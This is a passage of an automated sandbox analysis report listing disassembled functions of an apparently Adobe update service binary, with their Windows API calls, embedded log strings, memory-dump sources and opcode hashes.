                                                                                                                                                                                                                                                                    • Instruction ID: fd5c7f173d7ff98236ef34e570de3dcee1f7d7cb5b43113d8a8172f72fa9db4b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC718871E0424ADFDB45CF98C891BEEBBF0AF09314F184095E565FB241C238AA92DF64
                                                                                                                                                                                                                                                                    Function 02711748 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,027112D6,00000001,00000364,00000000,?,000000FF,?,027144E3,?,?,00000000), ref: 02711789
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000003.2765700918.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_3_26e0000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                    • Opcode ID: aea035a4320bfc883e516aeab754e2ccd9cc44f80c7455bfb0e041511875696f
                                                                                                                                                                                                                                                                    • Instruction ID: e6a7820a3f65e0be050a68eb808dd62856317c48a1d1772a4ce394be2c52ac86
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aea035a4320bfc883e516aeab754e2ccd9cc44f80c7455bfb0e041511875696f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADF0E03160023656DB321A3E5C49B7737599F41774B588012DE0C9E280EB30D40085E0
                                                                                                                                                                                                                                                                    Function 02713D41 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • LCMapStringEx.KERNELBASE(?,02710C92,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 02713D75
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000003.2765700918.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_3_26e0000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: String
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2568140703-0
                                                                                                                                                                                                                                                                    • Opcode ID: a1ac28e44215abc5f7dedfd8d6d7e03581c7f5aaacd764c783c92eeda93b8264
                                                                                                                                                                                                                                                                    • Instruction ID: 2867209df99a998f0360b7d06d1e553136fd7fbfc1a017552cc404d1058d22e1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1ac28e44215abc5f7dedfd8d6d7e03581c7f5aaacd764c783c92eeda93b8264
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ECF0643640025ABBCF226E96DC089DE3F26EF483A0F198150FA1825020CB32C831AB90
                                                                                                                                                                                                                                                                    Function 0270BEFA Relevance: 1.3, APIs: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(?,00000000,?), ref: 0270BFCE
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000003.2765700918.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_3_26e0000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                    • Opcode ID: df575e9b6c3d3f039e9f4be5740f6b08e00c8b368284e0f4954a4e7a853196e0
                                                                                                                                                                                                                                                                    • Instruction ID: 510f1b3c2a39e4086ba6fc93bce1ac745db4b6cb985a7c099135cf8c3f52832e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df575e9b6c3d3f039e9f4be5740f6b08e00c8b368284e0f4954a4e7a853196e0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B311A71D00219EFDB10CFA9D880BAEFBF5FB09708F109429E555A7280D771AA09CF54
                                                                                                                                                                                                                                                                    Function 0270BC80 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 0270BCC7
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000003.2765700918.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_3_26e0000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                    • Opcode ID: 76222675b61c8d803e36e6d0cea0e8896417380f2a3b3ee34fe2aefe609ac7de
                                                                                                                                                                                                                                                                    • Instruction ID: 2d9f049ab5244641aee3c0797c4686ed594263ee6b9e6c8981e65715ad8d39db
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76222675b61c8d803e36e6d0cea0e8896417380f2a3b3ee34fe2aefe609ac7de
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6EE065B5942612FBA3312A209D44D7F77ADEF517057059815FD15E2240DF30D91AC5B1

                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                    Function 004029A0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 247COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: AdobeUpdateService$AdobeUpdateService: Process certificate didnt match to Adobe certificate!$main: Finished$main: Started
                                                                                                                                                                                                                                                                    • API String ID: 0-108484121
                                                                                                                                                                                                                                                                    • Opcode ID: b3500d050bb6cdf61eb27a6f39655ff4180bc88b106c65d246eddb0ba753381a
                                                                                                                                                                                                                                                                    • Instruction ID: aa4f7462551908f85693e87270aad57e37dee6bb7c79447cbb64f1a26d33a99d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3500d050bb6cdf61eb27a6f39655ff4180bc88b106c65d246eddb0ba753381a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D491F870A002189FEB14DF65CD5ABAE7BB4EB04718F14417EE405B73C1EBB86A05CB99
                                                                                                                                                                                                                                                                    Function 02719277 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000003.2765700918.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_3_26e0000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                                                                                                    • Instruction ID: 305417b5de2736896cc07d351843b40d940d0da662f8aad022466509d37620fa
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EF06D79A00200CF8B28DF0EC558D96B7F6EF85724B6545A5E505AB221D3B0EE46CBA1
                                                                                                                                                                                                                                                                    Function 0041F500 Relevance: 30.4, APIs: 11, Strings: 9, Instructions: 396sleepCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,BB40E64E,?,00000008), ref: 0041F537
                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0041F53F
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0041F585
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0041F5C9
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0041F646
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$EnterSleep
                                                                                                                                                                                                                                                                    • String ID: CommBridge$Data size %i is larger than max buffer size, aborting write.$OOBEUtils$Out pipe handle is invalid, aborting write.$Pipe %p not initialized, aborting write.$Terminate channel$Writing data packet to pipe failed with error code %i$Writing info packet to pipe failed with error code %i$`J
                                                                                                                                                                                                                                                                    • API String ID: 4275215032-318403239
                                                                                                                                                                                                                                                                    • Opcode ID: 8abe9bf9aa2a41506b6c831e74ff08ca7d922cea81cd4335f7d1f82bf08bb469
                                                                                                                                                                                                                                                                    • Instruction ID: 357453fb2a3021c3316a4f80364e3140d53479557ee8387c2b372fbbb1bee486
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8abe9bf9aa2a41506b6c831e74ff08ca7d922cea81cd4335f7d1f82bf08bb469
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2E10770B40208ABDB00DF65DD4ABDE7BB5AF45700F24013AF806A72D1DB7CAA458B5D
                                                                                                                                                                                                                                                                    Function 004056B0 Relevance: 24.8, APIs: 4, Strings: 10, Instructions: 296sleepCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,00000028), ref: 0040587F
                                                                                                                                                                                                                                                                      • Part of subcall function 0041FA30: WaitForSingleObject.KERNEL32(00000008,000000FF,00000000,00000008,00405984,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB10
                                                                                                                                                                                                                                                                      • Part of subcall function 0041FA30: CloseHandle.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB19
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • Failed in creating client thread, xrefs: 00405984
                                                                                                                                                                                                                                                                    • Failed to sent communnication ID packet to the client, xrefs: 004059B9
                                                                                                                                                                                                                                                                    • thread failed to resumed. fatal error, xrefs: 0040594C
                                                                                                                                                                                                                                                                    • Failed in initial handshake with the client, xrefs: 004058F0
                                                                                                                                                                                                                                                                    • Successfully created the client thread, xrefs: 004059E8
                                                                                                                                                                                                                                                                    • Initializing Communication Channel with ACC with pipename: %s, xrefs: 00405862
                                                                                                                                                                                                                                                                    • Problem initializing Communication Channel. Quitting. Error code %d, xrefs: 004058A7
                                                                                                                                                                                                                                                                    • CreateIPCChannel failed for pipe %s, xrefs: 004058D0
                                                                                                                                                                                                                                                                    • Sent communnication ID packet to the client, xrefs: 004056EF
                                                                                                                                                                                                                                                                    • failed to create a new thread for ipc communications. Fatal Error, xrefs: 0040591A
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandleObjectSingleSleepWait
                                                                                                                                                                                                                                                                    • String ID: CreateIPCChannel failed for pipe %s$Failed in creating client thread$Failed in initial handshake with the client$Failed to sent communnication ID packet to the client$Initializing Communication Channel with ACC with pipename: %s$Problem initializing Communication Channel. Quitting. Error code %d$Sent communnication ID packet to the client$Successfully created the client thread$failed to create a new thread for ipc communications. Fatal Error$thread failed to resumed. fatal error
                                                                                                                                                                                                                                                                    • API String ID: 640476663-1070437462
                                                                                                                                                                                                                                                                    • Opcode ID: 68fa43ea2eba1087806099fb0bd63b4327f9badd3dddcdc44e0fb38c4a85424d
                                                                                                                                                                                                                                                                    • Instruction ID: dce432d37da255bfcb33f67ab20813508531a13952796c9d494c823ab279c1dd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68fa43ea2eba1087806099fb0bd63b4327f9badd3dddcdc44e0fb38c4a85424d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0A1D2B0A40615AFCB00DF65DC86B6E7BA4FF49704F10017AE505AB3D1DB78A914CB9A
                                                                                                                                                                                                                                                                    Function 00401A30 Relevance: 24.8, APIs: 5, Strings: 9, Instructions: 268synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000001,?,00401A1C), ref: 00401AC7
                                                                                                                                                                                                                                                                      • Part of subcall function 00401770: SetServiceStatus.ADVAPI32(004C8C64), ref: 00401821
                                                                                                                                                                                                                                                                      • Part of subcall function 00401770: GetLastError.KERNEL32 ref: 00401877
                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401520,00000000,00000000,00000000), ref: 00401B0D
                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00401A1C), ref: 00401C91
                                                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,00401A1C), ref: 00401C99
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00401A1C), ref: 00401D13
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$CloseCreateEventHandleObjectResetServiceSingleStatusThreadWait
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in DestroyEvent $NULL OOBE_Event_t object passed in WaitforEvent $OOBEEvents$OOBEUtils$SvcInit: Creat thread failed$SvcInit: Create thread successful$SvcInit: Finished$SvcInit: Now wating for the close signal$SvcInit: Started New
                                                                                                                                                                                                                                                                    • API String ID: 2548555128-2125176678
                                                                                                                                                                                                                                                                    • Opcode ID: fdb8e43f0c7796d05782fa09c5a4e7a52c29433dbb338b57c4b152e7f49b068c
                                                                                                                                                                                                                                                                    • Instruction ID: f73ab4652ae81edbc98d7fd2a5d95e0b0f6ab9935acceea9d8e153ccbd849a11
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fdb8e43f0c7796d05782fa09c5a4e7a52c29433dbb338b57c4b152e7f49b068c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9291D370B80315ABE710DB559D46B5E3BA4EB10B14F14017BF915B73D1EFB8A9008BAE
                                                                                                                                                                                                                                                                    Function 00427320 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 148fileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,00000000,0040674D), ref: 0042732E
                                                                                                                                                                                                                                                                    • PathIsDirectoryW.SHLWAPI(00000000), ref: 00427347
                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 0042735A
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0042736C
                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 00427386
                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00427420
                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00427431
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00427456
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004274A6
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: File$ErrorLast$AttributesDeletePath$DirectoryExists
                                                                                                                                                                                                                                                                    • String ID: Failed to delete file: '%s' LastError:%d$File '%s' is with read-only. Its attribute is: '%d'. UnSetting its read-only attr and retry deleting$FileUtils$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 2466363971-4107796821
                                                                                                                                                                                                                                                                    • Opcode ID: 00b6d3bf9a951ad68e80268370d137a51b95931526897c450c14d293331eb804
                                                                                                                                                                                                                                                                    • Instruction ID: 1d99e2006965ff6694df6736826d9ecfdb84e75553d3c6a76360acde75f41734
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00b6d3bf9a951ad68e80268370d137a51b95931526897c450c14d293331eb804
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3341A530745221EBCA10DF19FD99A5A7B65FB85B01BA40477F80197290DB78BC90CBBD
                                                                                                                                                                                                                                                                    Function 00427AB0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 182encryptionmemoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WinVerifyTrust.WINTRUST(000000FF,?*@`J,?,BB40E64E,?,?), ref: 00427B84
                                                                                                                                                                                                                                                                    • WTHelperProvDataFromStateData.WINTRUST(00000000), ref: 00427B95
                                                                                                                                                                                                                                                                    • WTHelperGetProvSignerFromChain.WINTRUST(00000000,00000000,00000000,00000000), ref: 00427BAA
                                                                                                                                                                                                                                                                    • WTHelperGetProvCertFromChain.WINTRUST(00000000,00000000), ref: 00427BCA
                                                                                                                                                                                                                                                                    • CertGetNameStringW.CRYPT32(?,00000004,00000000,00000000,00000000,00000000), ref: 00427C07
                                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000), ref: 00427C22
                                                                                                                                                                                                                                                                    • CertGetNameStringW.CRYPT32(?,00000004,00000000,00000000,00000000,?), ref: 00427C41
                                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 00427C6A
                                                                                                                                                                                                                                                                    • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,00000034), ref: 00427D07
                                                                                                                                                                                                                                                                    Strings
